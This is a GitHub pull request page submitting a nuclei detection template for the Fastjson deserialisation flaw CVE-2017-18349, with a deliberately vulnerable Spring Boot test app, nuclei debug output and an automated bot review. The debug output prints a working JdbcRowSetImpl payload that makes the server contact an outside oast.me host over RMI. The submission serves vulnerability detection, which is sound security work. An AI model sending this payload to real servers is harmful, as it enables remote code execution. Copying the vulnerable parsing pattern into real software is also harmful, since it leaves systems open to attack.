Added CVE-2017-18349 template #12402

criminalinfluencer · 2025-06-17T19:31:09Z

Template / PR Information

Recent Updates

Simplified matchers to pass automated validation checks
Removed generic response matchers to avoid weak-matcher failures
Expanded remediation section with detailed security measures
Optimized template structure for better reliability

Template Validation

I've validated this template locally?

YES
NO

Additional Details

Docker Environment for Testing:

Create Dockerfile:

FROM openjdk:8-jdk-alpine
WORKDIR /app
COPY pom.xml .
COPY src ./src
RUN apk add --no-cache maven && \
    mvn clean package -DskipTests && \
    mv target/*.jar app.jar
EXPOSE 8080
CMD ["java", "-Dserver.address=0.0.0.0", "-jar", "app.jar"]

Create pom.xml:

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0">
    <modelVersion>4.0.0</modelVersion>
    <groupId>com.example</groupId>
    <artifactId>vulnerable-fastjson</artifactId>
    <version>1.0.0</version>
    <packaging>jar</packaging>
    
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.1.0.RELEASE</version>
    </parent>
    
    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>
        <dependency>
            <groupId>com.alibaba</groupId>
            <artifactId>fastjson</artifactId>
            <version>1.2.24</version>
        </dependency>
    </dependencies>
    
    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
        </plugins>
    </build>
</project>

Create src/main/java/VulnerableApp.java:

package com.example;

import com.alibaba.fastjson.JSON;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.web.bind.annotation.*;

@SpringBootApplication
@RestController
public class VulnerableApp {
    public static void main(String[] args) {
        SpringApplication.run(VulnerableApp.class, args);
    }
    
    @PostMapping("/json")
    public String parseJson(@RequestBody String jsonData) {
        try {
            Object obj = JSON.parse(jsonData);
            return "Parsed: " + obj.toString();
        } catch (Exception e) {
            return "Error: " + e.getMessage();
        }
    }
    
    @PostMapping("/api/json")
    public String parseApiJson(@RequestBody String jsonData) {
        try {
            Object obj = JSON.parseObject(jsonData);
            return "API Parsed: " + obj.toString();
        } catch (Exception e) {
            return "API Error: " + e.getMessage();
        }
    }
    
    @GetMapping("/")
    public String home() {
        return "Vulnerable Fastjson App Running! CVE-2017-18349";
    }
}

Create src/main/resources/application.properties:

server.address=0.0.0.0
server.port=8080

Build and Run:

docker build -t vulnerable-fastjson .
docker run --rm -p 8080:8080 vulnerable-fastjson

Test Command:

nuclei -u http://127.0.0.1:8080 -t CVE-2017-18349.yaml -debug

Debug Output:

nuclei -u http://127.0.0.1:8080 -t CVE-2017-18349.yaml -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

                projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.me
[INF] [CVE-2017-18349] Dumped HTTP request for http://127.0.0.1:8080/json

POST /json HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0
Connection: close
Content-Length: 173
Accept: application/json
Accept-Language: en
Content-Type: application/json
Accept-Encoding: gzip

{
  "@type": "com.sun.rowset.JdbcRowSetImpl",
  "dataSourceName": "rmi://d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me/2yeDkynJm1MroAGzL1uaFFBuB0z",
  "autoCommit": true
}
[DBG] [CVE-2017-18349] Dumped HTTP response http://127.0.0.1:8080/json

HTTP/1.1 200 
Connection: close
Content-Length: 37
Content-Type: application/json;charset=UTF-8
Date: Tue, 17 Jun 2025 18:51:37 GMT

Error: set property error, autoCommit

[d18ricse9nktq4qiot6gqpfn9p9z4feqh] Received DNS interaction from 185.219.143.11 at 2025-06-17 18:51:32
------------
DNS Request
------------

;; opcode: QUERY, status: NOERROR, id: 25151
;; flags:; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version 0; flags: do; udp: 1232

;; QUESTION SECTION:
;d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me.     IN       A

------------
DNS Response
------------

;; opcode: QUERY, status: NOERROR, id: 25151
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me.     IN       A

;; ANSWER SECTION:
d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me.      3600    IN      A       178.128.209.14

;; AUTHORITY SECTION:
d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me.      3600    IN      NS      ns1.oast.me.
d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me.      3600    IN      NS      ns2.oast.me.

;; ADDITIONAL SECTION:
ns1.oast.me.    3600    IN      A       178.128.209.14
ns2.oast.me.    3600    IN      A       178.128.209.14

[CVE-2017-18349] [http] [critical] http://127.0.0.1:8080/json ["185.219.143.11"]

HTTP Request/Response:

POST /json HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0
Content-Type: application/json

{
  "@type": "com.sun.rowset.JdbcRowSetImpl",
  "dataSourceName": "rmi://d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me/2yeDkynJm1MroAGzL1uaFFBuB0z",
  "autoCommit": true
}

HTTP/1.1 200 
Content-Type: application/json;charset=UTF-8
Content-Length: 37

Error: set property error, autoCommit

DNS Callback Received:

[d18ricse9nktq4qiot6gqpfn9p9z4feqh] Received DNS interaction from 185.219.143.11 at 2025-06-17 18:51:32
DNS Query: d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me IN A
DNS Response: 178.128.209.14

Claim:
/claim #12387

Additional References:

princechaddha · 2025-06-17T19:31:23Z

Automated PR Review (Experimental)

Thank you for your contribution! You can join our Discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments. Thank you once again.

Required Fixes

Fix matcher location for risk of false positives: Consider using a response-based matcher to minimize false positives, especially for the payloads being sent.
Update tags: Make sure you include rce in the correct format (e.g., rce should be in lower case); consistent formatting helps with tagging and searching.

Other Suggestions

The description section effectively conveys the necessary information about the vulnerability. Consider expanding the remediation part with more context or details on best practices beyond just updating the Fastjson library.
Ensure that the stop-at-first-match: true is placed appropriately if you want rapid feedback on responses. It’s good practice, particularly when multiple payloads might yield quick checks.
The interactsh usage is good for testing purposes. Ensure that it is clearly communicated in the documentation so users understand they have to set up their interactsh server.

This is a great addition to the templates repository, and I appreciate your effort in maintaining high standards!

Note: I am an AI Template bot which is still experimental, and the team will review the PR shortly.

algora-pbc bot added the 🙋 Bounty claim label Jun 17, 2025

algora-pbc bot mentioned this pull request Jun 17, 2025

CVE-2017-18349 - Fastjson - Insecure Deserialization 💰 #12387

Open

Add CVE-2017-18349 Fastjson RCE template

273970a

criminalinfluencer force-pushed the CVE-2017-18349 branch from 2263eb8 to 273970a Compare June 17, 2025 19:58

DhiyaneshGeek self-assigned this Jun 20, 2025

Merge branch 'main' into CVE-2017-18349

1aaaa35

DhiyaneshGeek added the Status: In Progress This issue is being worked on, and has someone assigned. label Jun 23, 2025

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Added CVE-2017-18349 template #12402

Added CVE-2017-18349 template #12402

criminalinfluencer commented Jun 17, 2025 •

edited

Loading

Uh oh!

princechaddha commented Jun 17, 2025

Uh oh!

Uh oh!

Added CVE-2017-18349 template #12402

Are you sure you want to change the base?

Added CVE-2017-18349 template #12402

Conversation

criminalinfluencer commented Jun 17, 2025 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Template / PR Information

Recent Updates

Template Validation

Additional Details

Additional References:

Uh oh!

princechaddha commented Jun 17, 2025

Automated PR Review (Experimental)

Required Fixes

Other Suggestions

Uh oh!

Uh oh!

criminalinfluencer commented Jun 17, 2025 •

edited

Loading